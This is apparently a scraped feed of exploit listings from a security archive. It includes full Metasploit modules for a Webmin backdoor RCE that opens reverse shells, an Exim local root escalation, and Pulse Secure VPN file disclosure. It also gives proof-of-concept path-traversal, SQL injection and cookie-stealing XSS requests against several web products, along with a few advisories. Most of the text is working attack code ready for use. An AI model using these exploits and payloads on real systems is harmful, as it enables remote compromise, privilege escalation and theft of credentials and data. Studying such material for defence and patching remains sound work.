This Metasploit module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project’s site. Unknown attacker(s) inserted Perl qx statements into the build server’s source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled.

MD5 | a2360d86ccb3b9b45e1315630a785649

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin password_change.cgi Backdoor',
'Description' => %q{
This module exploits a backdoor in Webmin versions 1.890 through 1.920.
Only the SourceForge downloads were backdoored, but they are listed as
official downloads on the project's site.

Unknown attacker(s) inserted Perl qx statements into the build server's
source code on two separate occasions: once in April 2018, introducing
the backdoor in the 1.890 release, and in July 2018, reintroducing the
backdoor in releases 1.900 through 1.920.

Only version 1.890 is exploitable in the default install. Later affected
versions require the expired password changing feature to be enabled.
},
'Author' => [
'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
'wvu' # This module and updated information about the backdoor
],
'References' => [
['CVE', '2019-15107'], # y tho
['URL', 'http://www.webmin.com/exploit.html'],
['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
['URL', 'https://github.com/webmin/webmin/issues/947']
],
'DisclosureDate' => '2019-08-10',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Automatic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => [
Gem::Version.new('1.890'), Gem::Version.new('1.920')
],
'Type' => :unix_memory,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
],
['Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => [
Gem::Version.new('1.890'), Gem::Version.new('1.920')
],
'Type' => :linux_dropper,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
Opt::RPORT(10000),
OptString.new('TARGETURI', [true, 'Base path to Webmin', '/'])
])

register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
vprint_error('Server did not respond')
return CheckCode::Unknown
end

version =
res.headers['Server'].to_s.scan(%r{MiniServ/([d.]+)}).flatten.first

unless version
vprint_error('Webmin version not detected')
return CheckCode::Unknown
end

version = Gem::Version.new(version)

vprint_status("Webmin #{version} detected")
checkcode = CheckCode::Detected

unless version.between?(*target['Version'])
vprint_error("Webmin #{version} is not a supported target")
return CheckCode::Safe
end

vprint_good("Webmin #{version} is a supported target")
checkcode = CheckCode::Appears

res = execute_command("echo #{token}")

unless res
vprint_error('Webmin did not respond to check command')
return checkcode
end

if res.body.include?('Password changing is not enabled!')
vprint_error('Expired password changing disabled')
return CheckCode::Safe
end

if res.body.include?(token)
vprint_good('Webmin executed a benign check command')
checkcode = CheckCode::Vulnerable
else
vprint_error('Webmin did not execute our check command')
return CheckCode::Safe
end

checkcode
end

def exploit
# These CheckCodes are allowed to pass automatically
checkcodes = [
CheckCode::Appears,
CheckCode::Vulnerable
]

unless checkcodes.include?(check) || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end

print_status("Configuring #{target.name} target")

case target['Type']
when :unix_memory
print_status("Sending #{datastore['PAYLOAD']} command payload")
vprint_status("Generated command payload: #{payload.encoded}")

res = execute_command(payload.encoded)

if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
print_warning('Dumping command output in full response body')

if res.body.empty?
print_error('Empty response body, no command output')
return
end

print_line(res.body)
end
when :linux_dropper
print_status("Sending #{datastore['PAYLOAD']} command stager")
execute_cmdstager
end
end

=begin
wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
#!/usr/bin/perl
2:1c
#!/usr/local/bin/perl
====1
1:12c
$in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
# Show ok page
3:200c

wvu@kharak:~/Downloads$
=end
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
'headers' => {'Referer' => full_uri},
'vars_post' => {
# 1.890
'expired' => cmd,
# 1.900-1.920
'new1' => token,
'new2' => token,
'old' => cmd
}
}, 3.5)
end

def token
@token ||= Rex::Text.rand_text_alphanumeric(8..42)
end

end

Source

This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.

MD5 | 7e40628c1d0b1ff1461825cb7e5d4b58

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System

def initialize(info = {})
super(update_info(info,
'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
Improper validation of recipient address in deliver_message()
function in /src/deliver.c may lead to command execution with root privileges
(CVE-2019-10149).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and PoC (@qualys)
'Dennis Herrmann', # Working exploit (@dhn)
'Marco Ivaldi', # Working exploit (@0xdea)
'Guillaume André' # Metasploit module (@yaumn_)
],
'DisclosureDate' => '2019-06-05',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[
'Exim 4.87 - 4.91',
lower_version: Gem::Version.new('4.87'),
upper_version: Gem::Version.new('4.91')
]
],
'DefaultOptions' =>
{
'PrependSetgid' => true,
'PrependSetuid' => true
},
'References' =>
[
[ 'CVE', '2019-10149' ],
[ 'EDB', '46996' ],
[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
]
))

register_options(
[
OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
])

register_advanced_options(
[
OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end

def base_dir
datastore['WritableDir'].to_s
end

def encode_command(cmd)
'x' + cmd.unpack('H2' * cmd.length).join('x')
end

def open_tcp_connection
socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
params = Rex::Socket::Parameters.new({
'PeerHost' => '127.0.0.1',
'PeerPort' => datastore['EXIMPORT']
})
begin
socket = socket_subsystem.create_tcp_client_channel(params)
rescue => e
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "
"are you sure exim is listening on this port? (see EXIMPORT)")
raise e
end
return socket_subsystem, socket
end

def inject_payload(payload)
if session.type == 'meterpreter'
socket_subsystem, socket = open_tcp_connection

tcp_conversation = {
nil => /220/,
'helo localhost' => /250/,
"MAIL FROM:" => /250/,
"RCPT TO:" => /250/,
'DATA' => /354/,
'Received:' => nil,
'.' => /250/
}

begin
tcp_conversation.each do |line, pattern|
Timeout.timeout(datastore['SendExpectTimeout']) do
if line
if line == 'Received:'
for i in (1..31)
socket.puts("#{line} #{i}n")
end
else
socket.puts("#{line}n")
end
end
if pattern
socket.expect(pattern)
end
end
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
ensure
socket.puts("QUITn")
socket.close
socket_subsystem.shutdown
end
else
unless cmd_exec("/bin/bash -c 'exec 3/dev/tcp/localhost/#{datastore['EXIMPORT']}' "
"&& echo true").chomp.to_s == 'true'
fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
end

bash_script = %|
#!/bin/bash

exec 3/dev/tcp/localhost/#{datastore['EXIMPORT']}
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:" >&3
read -u 3 && echo $REPLY
echo 'rcpt to:' >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in $(seq 1 30); do
echo 'Received: $i' >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
|

@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@bash_script_path, bash_script)
register_file_for_cleanup(@bash_script_path)
chmod(@bash_script_path)
cmd_exec("/bin/bash -c "#{@bash_script_path}"")
end

print_status('Payload sent, wait a few seconds...')
Rex.sleep(5)
end

def check_for_bash
unless command_exists?('/bin/bash')
fail_with(Failure::NotFound, 'bash not found')
end
end

def on_new_session(session)
super

if session.type == 'meterpreter'
session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
session.fs.file.rm(@payload_path)
else
session.shell_command_token("rm -f #{@payload_path}")
end
end

def check
if session.type == 'meterpreter'
begin
socket_subsystem, socket = open_tcp_connection
rescue
return CheckCode::Safe
end
res = socket.gets
socket.close
socket_subsystem.shutdown
else
check_for_bash
res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "
"(read -u 3 && echo $REPLY) || echo false'")
if res == 'false'
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "
"are you sure exim is listening on this port? (see EXIMPORT)")
return CheckCode::Safe
end
end

if res =~ /Exim ([0-9.]+)/i
version = Gem::Version.new($1)
vprint_status("Found exim version: #{version}")
if version >= target[:lower_version] && version <= target[:upper_version]
return CheckCode::Appears
else
return CheckCode::Safe
end
end

CheckCode::Unknown
end

def exploit
if is_root?
unless datastore['ForceExploit']
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
end

unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end

if nosuid?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
end

unless datastore['PrependSetuid'] && datastore['PrependSetgid']
fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order '
'to get root privileges.')
end

if session.type == 'shell'
check_for_bash
end

@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@payload_path, payload.encoded_exe)
register_file_for_cleanup(@payload_path)
inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"
"chmod 4755 #{@payload_path}'"))

unless setuid?(@payload_path)
fail_with(Failure::Unknown, "Couldn't escalate privileges")
end

cmd_exec("#{@payload_path} & echo ")
end
end

Source

Nimble Stream versions 3.0.2-2 up to 3.5.4.9 suffer from a directory traversal vulnerability.

MD5 | 87b6edb28bc7d0b0f16401f7be58e5ff

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
# Successful exploitation could allow an attacker to traverse the file system to access
# files or directories that are outside of the restricted directory on the remote server.


POC :
- http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448

Source

The NTFS driver supports a new FS control code to set a mount point which the existing sandbox mitigation doesn’t support allowing a sandboxed application to set an arbitrary mount point symbolic link.

MD5 | 0943b5ee8bb525ed81875df4a3ae481f

Source

Endian Firewall version 3.3.0 suffers from a cross site scripting vulnerability.

MD5 | 2dc274d1f115293fb370ca32fa329935

# Exploit Title: Endian Firewall cross-site scripting (XSS)
# Date: 08/22/2019
# Exploit Authors: Milad Soltanian + G0dfather ( @irpwn )
# Vendor Homepage: https://www.endian.com
# Version : 3.3.0

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.



1 - login

2 - open the url below to edit network configuration

3 - forward the step till u face Step 3/8: Network preferences

4 - now put the payload in IP address input

[PAYLOAD] = "><!--




[EXAMPLE REQUESTE]

POST /cgi-bin/netwizard.cgi HTTP/1.1
Host: 5.9.96.86:10443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Authorization: Basic YWRtaW46bWEhQCM0NTY=
Connection: close
Referer: https://192.168.1.10:10443/cgi-bin/netwizard.cgi
Cookie: en-visit=216e4cac7868d0ca041c21489faa817d1a8faca5; session_id=2fcdb768fee725b270598427fa6f4ed10f6774ca; endian_webshell=354369204
Upgrade-Insecure-Requests: 1

session_id=174960656&step=3&DHCP_ENABLE_GREEN=on&DISPLAY_GREEN_ADDRESS=%22%3E%3Cimg+src%3DaWd3l+onerror%3Dalert%28document.cookie%29%3E%3C%21--&DISPLAY_GREEN_NETMASK=24&DISPLAY_GREEN_ADDITIONAL=&GREEN_DEVICES=0&HOSTNAME=efw-82aabd1d48&DOMAINNAME=localdomain&next=%3E%3E%3E

Source

Wikindx version 5.8.2 suffers from a remote SQL injection vulnerability.

MD5 | f239435b7bff4607a149973766618d31

###################################################################

# Exploit Title : Wikindx 5.8.2 Virtual Research Environment Library Manager SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/03/2019
# Vendor Homepage : wikindx.sourceforge.net
# Software Download Link : sourceforge.net/projects/wikindx/files/latest/download
# Software Version : 5.x - 5.8.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description about Software :
***************************
Wikindx is a free Virtual Research Environment (an online bibliographic and
quotations/notes management and article authoring system) designed either
for single use (on a variety of operating systems) or multi-user collaborative
use across the internet.

###################################################################

# Impact :
***********
Wikindx 5.8.2 Virtual Research Environment Library Manager is prone to an
SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data
before using it in an SQL query. Exploiting this issue could allow an attacker to
compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request
to the vulnerable application and execute arbitrary SQL commands in a
pplication`s database. Further exploitation of this vulnerability may result in
unauthorized data manipulation. An attacker can exploit this issue using a browser
or with any SQL Injector Tool.

###################################################################

# Admin Panel Login Path :
*************************
/index.php?action=usersgroups_MYWIKINDX_CORE

# SQL Injection Exploit :
**********************
/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[SQL Injection]&type=lastMulti

/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[ID-NUMBER]&PagingStart=[SQL Injection]

/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=[SQL Injection]

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Source

Snapforce CRM version 8.3.0 suffers from multiple cross site scripting vulnerabilities.

MD5 | 7cba26c3ea2972fcf97c2e39c9893c15

Hello Team,

Greetings. there is list of xss vulnerabilities and Concurrent login
vulnerabilities are in snapforce
(version 8.3.0)
application.



*Vulnerability List: *

1. Stored Cross Site Scripting

2. Stored Cross Site Scripting thorough UI Redirection.

3 Concurrent Login are Allowed

*Effected URL: *

https://crm.snapforce.com/prodigy/login.php



*Steps to reproduce:*

1.Login to application using https://crm.snapforce.com/prodigy/login.php

2. Goto the Accounts creation location and create new Account.

3. Fill all required parameters and insert XSS payload in description
location and save it.

4. once you saved the xss payload in description location cross site
scripting payload can execute.

5. application can redirect to attacker application my case i have
redirected to google.com page

6. for more information please see attached file



*Payloads:*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

document.location='https://google.com'

*Mitigation:*

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet




• Output encoding: It is recommended to implement ‘output encoding’ to
convert untrusted input into a safe form where the input is displayed as
data to the user without executing as code in the browser.



Java HTML encoding Function

public static String HTMLEncode(String aTagFragment){

final StringBuffer result = new StringBuffer();

final StringCharacterIterator iterator = new

StringCharacterIterator(aTagFragment);

char character = iterator.current();

while (character != StringCharacterIterator.DONE )

{

if (character == '<') result.append("<");

else if (character == '>') result.append(">");

else if (character == '"') result.append(""");

else if (character == ''') result.append("'");

else if (character == '\') result.append("");

else if (character == '&') result.append("&");

else {

//the char is not a special one

//add it to the result as is

result.append(character);

}

character = iterator.next();

}

return result.toString();

}



• Escaping: Escape all untrusted data based on the HTML context (body,
attribute, JavaScript, CSS, or URL) that the data will be placed into.

EASPI API

String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input"
) );



• Filtering input parameter: Positive or "whitelist" input validation with
appropriate canonicalization is the recommended filtering technique.
Alternatively, black-list filtering input works by removing some or all
special characters from your input. Special characters are characters that
enable script to be generated within an HTML stream. Special characters
include the following:

" ' % ; ) ( & + -

JavaScript Codefunction RemoveBad(strTemp) {

strTemp = strTemp.replace(/|"|'|%|;|(|)|&|+|-/g,"");

return strTemp;

}

Source

KBPublisher version 6.0.2.1 suffers from multiple remote SQL injection vulnerabilities.

MD5 | 1eb1a06483952b05b3a15269d967cfab

          ===============================
- Advisory -
===============================

Tittle: KBPublisher 6.0.2.1 - Multiple SQL Injection
Risk: High
Date: 21.Aug.2019
Author: Pedro Andujar
Twitter: @pandujar



.: [ INTRO ] :

KBPublisher is Knowledge Management Software. It reduces the need for customer support, improves staff productivity, and eliminates
time wasted searching for information.


.: [ TECHNICAL DESCRIPTION ] :.

KBPublisher release 6.0.2, and probably prior versions, contain multiple SQLi vulnerabilities that affect not only the admin interface but also the public (unauthenticated)
area of the application


.: [ ISSUE #1 ]:.

Name: Multiple SQLi
Severity: High
CVE: CVE-2019-10687

Affected URL's from the admin area:
https://SITE/admin/index.php?module=report&page=report_entry&entry_id%5B0%5D=325PAYLOAD&filter%5Bt%5D=1&ajax=1 (Also affecting to POST parameters)

https://SITE/admin/index.php?module=log&page=login_log&action=detail&id=PAYLOAD

The publicly accesible URL, correspond to the print feature:
https://SITE/index.php?View=print&id%5B%5D=PAYLOAD

During the test, it was possible to dump users and hashes of the application as any other content from the DB.


.: [ CHANGELOG ] :.

* 21/Mar/2019: - Vuln discovered during engagement.
* 21/Mar/2019: - KBP product security contacted.
* 22/Mar/2019: - Replied providing workarround.
* 30/Apr/2019: - New release of KBP released to public.
* 21/Ago/2019: - Public disclosure.

(Kudos to Evgeny Leontev, for the excelent communication and incident handling)


.: [ SOLUTIONS ] :.

Upgrade to version 7.0 or higher.


.: [ REFERENCES ] :.

[+] KBPublisher Release Notes
https://www.kbpublisher.com/kb/release-notes-59/

[+] Tarlogic
https://www.tarlogic.com/

[+] Black Arrow
https://www.blackarrow.net




-=EOF=-

Source

Zoho Corporation ManageEngine ServiceDesk Plus 10 versions prior to 10509 suffer from an information leakage vulnerability.

MD5 | df7de6aef789543ff67c502b96571b31

SEC Consult Vulnerability Lab Security Advisory 
=======================================================================
title: Unauthenticated sensitive information leakage
product: Zoho Corporation ManageEngine ServiceDesk Plus
vulnerable version: v10 <10509
fixed version: v10 >=10509
CVE number: CVE-2019-15045, CVE-2019-15046
impact: Critical
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-06-27
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders
alike."

Source: https://www.manageengine.com/products/service-desk/


Business recommendation:
------------------------
The vendor provides a patched version and it should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a short
spot check has been performed and further critical issues are to be expected.
A workaround exists for mitigating vulnerability 1b (user enumeration).


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The software offers functionality (fosagent) that an unauthenticated attacker can
exploit in order to gain information of internal "events". In our test it was
possible to access sensitive internal information (tickets) written by users of
this application in exchange with the support team. Depending on the contents of
the tickets, sensitive data might leak through this functionality. It is likely,
that it also depends on the configuration of ServiceDesk Plus which information is
stored in those "events".

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
It is possible to collect valid usernames by interacting with the
"AjaxDomainServlet" function of the application without prior authentication.
This vulnerability is useful to increase the efficiency of brute force attacks.
If the username is known, it is easier to find the corresponding password.

Furthermore, the servlet leaks information, whether the user is a locally
configured or a domain user and it also leaks the internal domain names of the
requested user account.

According to the vendor, the affected feature is intended behaviour and a
workaround in order to disable it has been provided (see further below).


Proof of concept:
-----------------
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet which an
unauthenticated attacker can use in order to iterate through existing internal
"events". The information that can be downloaded looks like internal ticket system
information and other data exchanged between users and the help desk support team.
It is necessary to supply the "log-pos" parameter given a number followed by a
colon character and another number to access the corresponding event index. An
attacker can just increment those numbers and access different information.

https://$IP/fosagent/repl/download-file?log-pos=1:0


b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts configured
within ManageEngine ServiceDesk Plus. No prior authentication is required for
this functionality. The "search" parameter is used for supplying the user account
name.

https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=$USER

If the user exists and is a local user (configured within the web application)
it will show "Not in Domain" as a result. If the user exists and is a domain
user (e.g. LDAP) it will show the corresponding internal domain name as a result.
If the page stays empty the user does not exist.


Vulnerable / tested versions:
-----------------------------
Version 10 has been tested. The vendor did not confirm whether older releases are
affected as well.


Vendor contact timeline:
------------------------
2019-07-02: Contacting vendor through ManageEngine Security Response Center
(MESRC)
Uploaded security advisory to bugbounty.zoho.com
2019-07-02: Vendor: acknowledged our report and will get back to us soon
2019-07-08: Asking for a status update; reponse: "we've investigated the report
and working on the fix now"
2019-07-10: Asking about CVE numbers and requesting heads-up before release
2019-08-13: Asking for a status update
2019-08-13: Vendor: vulnerability has already been fixed and released in version
10509
2019-08-21: Release of security advisory


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#10509


Workaround:
-----------
Vulnerability 1b - User Enumeration: the affected feature is intended behaviour
for usability but the vendor provided a workaround in order to disable this
feature.

The admin can disable this in:
Admin-Self-Service Portal Settings (Configuration - Allow Domain Filtering during
Login).


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF J. Greil / @2019

Source

This Metasploit module exploits Pulse Secure SSL VPN versions 8.1R15.1, 8.2, 8.3, and 9.0 which suffer from an arbitrary file disclosure vulnerability.

MD5 | 92b2a1881666fc4bc0c0655e5585cfa2

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
],
'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))

end


def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ooof, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)

end
fileObj.close
end
end

Source